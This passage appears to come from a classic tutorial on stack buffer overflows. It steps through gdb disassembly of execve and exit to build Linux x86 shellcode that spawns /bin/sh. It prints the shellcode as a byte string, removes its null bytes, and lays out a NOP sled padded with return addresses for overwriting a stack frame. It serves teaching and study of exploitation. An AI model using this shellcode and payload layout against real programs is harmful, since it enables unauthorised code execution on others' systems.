: push %ebp 0x80481e1 : mov %esp,%ebp 0x80481e3 : sub $0x8,%esp 0x80481e6 : movl $0x808dbc8,0xfffffff8(%ebp) 0x80481ed : movl $0x0,0xfffffffc(%ebp) 0x80481f4 : sub $0x4,%esp 0x80481f7 : push $0x0 # NULL 0x80481f9 : lea 0xfffffff8(%ebp),%eax # address of name 0x80481fc : push %eax 0x80481fd : pushl 0xfffffff8(%ebp) # name[0] 0x8048200 : call 0x804cab0 <__execve> 0x8048205 : add $0x10,%esp 0x8048208 : mov $0x0,%eax 0x804820d : leave 0x804820e : ret End of assembler dump. (gdb) inside execve the stack looks like ebp -> sfp ret (4)%ebp name[0] (8)%ebp name (c)%ebp NULL (4 bytes of 0) (10)%ebp and disassemble __execve to see how execve works. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x804cab0 <__execve>: push %ebp 0x804cab1 <__execve+1>: mov $0x0,%eax 0x804cab6 <__execve+6>: mov %esp,%ebp 0x804cab8 <__execve+8>: test %eax,%eax 0x804caba <__execve+10>: push %edi 0x804cabb <__execve+11>: push %ebx 0x804cabc <__execve+12>: mov 0x8(%ebp),%edi # !!! 0x804cabf <__execve+15>: je 0x804cac6 <__execve+22> 0x804cac1 <__execve+17>: call 0x0 0x804cac6 <__execve+22>: mov 0xc(%ebp),%ecx # !!! 0x804cac9 <__execve+25>: mov 0x10(%ebp),%edx # !!! 0x804cacc <__execve+28>: push %ebx 0x804cacd <__execve+29>: mov %edi,%ebx 0x804cacf <__execve+31>: mov $0xb,%eax 0x804cad4 <__execve+36>: int $0x80 0x804cad6 <__execve+38>: pop %ebx 0x804cad7 <__execve+39>: mov %eax,%ebx 0x804cad9 <__execve+41>: cmp $0xfffff000,%ebx 0x804cadf <__execve+47>: jbe 0x804caef <__execve+63> 0x804cae1 <__execve+49>: neg %ebx 0x804cae3 <__execve+51>: call 0x80484ac <__errno_location> 0x804cae8 <__execve+56>: mov %ebx,(%eax) 0x804caea <__execve+58>: mov $0xffffffff,%ebx 0x804caef <__execve+63>: mov %ebx,%eax 0x804caf1 <__execve+65>: pop %ebx 0x804caf2 <__execve+66>: pop %edi 0x804caf3 <__execve+67>: pop %ebp 0x804caf4 <__execve+68>: ret End of assembler dump. 
exit.c ------------------------------------------------------------------------------ #include <stdlib.h> void main() { exit(0); } ------------------------------------------------------------------------------ [aleph1]$ gcc -o exit -static exit.c [aleph1]$ gdb exit Putting all of this together, here is what the shell code should do... 1) Setup data to appear as after char *name[2]; name[0] = "/bin/sh"; // address of "/bin/sh" name[1] = NULL; // long NULL 2) Simulate the call to execve(name[0], name, NULL); | | | v v v ebx ecx edx 0xb->eax then int $0x80 a) Have the null terminated string "/bin/sh" somewhere in memory. b) Have the address of the string "/bin/sh" somewhere in memory followed by a null long word. c) Copy 0xb into the EAX register. d) Copy the address of the address of the string "/bin/sh" into the ECX register. e) Copy the address of the string "/bin/sh" into the EBX register. f) Copy the address of the null long word into the EDX register. g) Execute the int $0x80 instruction. h) Copy 0x1 into the EAX register. i) Copy 0x0 into the EBX register. j) Execute the int $0x80 instruction. jmp 0x2a # 3 bytes trick! to find address of /bin/sh popl %esi # 1 byte trick! on the stack movl %esi,0x8(%esi) # 3 bytes put the address of /bin/... in... movb $0x0,0x7(%esi) # 4 bytes null terminate /bin/... movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes call execve movl $0x1, %eax # 5 bytes call exit movl $0x0, %ebx # 5 bytes call exit int $0x80 # 2 bytes call exit call -0x2f # 5 bytes trick! esi-> .string \"/bin/sh\" # 8 bytes 7(%esi) z # 1 byte to be null termination of string 8(%esi) xxxx # 4 bytes address of "/bin/sh" 'name[0]' c(%esi) yyyy # 4 bytes NULL (long 0) 'name[1]' We still have a few problems!! Problem: This is not a string. Solution: That is easy to fix, you can examine the bytes of... 
shellcodeasm.c ------------------------------------------------------------------------------ void main() { __asm__(" jmp 0x2a # 3 bytes popl %esi # 1 byte movl %esi,0x8(%esi) # 3 bytes movb $0x0,0x7(%esi) # 4 bytes movl $0x0,0xc(%esi) # 7 bytes movl $0xb,%eax # 5 bytes movl %esi,%ebx # 2 bytes leal 0x8(%esi),%ecx # 3 bytes leal 0xc(%esi),%edx # 3 bytes int $0x80 # 2 bytes movl $0x1, %eax # 5 bytes movl $0x0, %ebx # 5 bytes int $0x80 # 2 bytes call -0x2f # 5 bytes .string \"/bin/sh\" # 8 bytes "); } ------------------------------------------------------------------------------ in gdb (gdb) x/bx main+3 ... Here it is as a string... "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; Problem: This has some \x00 in it. This will effectively end the string. Solution: Use some tricks to generate \x00 without actually having 0 in your code. Problem instruction: Substitute with: -------------------------------------------------------- movb $0x0,0x7(%esi) xorl %eax,%eax movl $0x0,0xc(%esi) movb %al,0x7(%esi) movl %eax,0xc(%esi) -------------------------------------------------------- movl $0xb,%eax movb $0xb,%al -------------------------------------------------------- movl $0x1, %eax xorl %ebx,%ebx movl $0x0, %ebx movl %ebx,%eax inc %eax -------------------------------------------------------- Final shell code: "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; To use this on a particular program (os version, gcc version, software version) you would do something like... Add in \x90 to the beginning (noop) and pad the end with a return address which will land the CPU back in the string of NO-OPs. 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" <----- "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" | "\x80\xe8\xdc\xff\xff\xff/bin/sh" // 13 chars | "\x44\xb0\xff\xbf" | "\x44\xb0\xff\xbf" | "\x44\xb0\xff\xbf" <- hopefully one of these correctly overwrites | "\x44\xb0\xff\xbf"; <- the return address and jumps us back to ------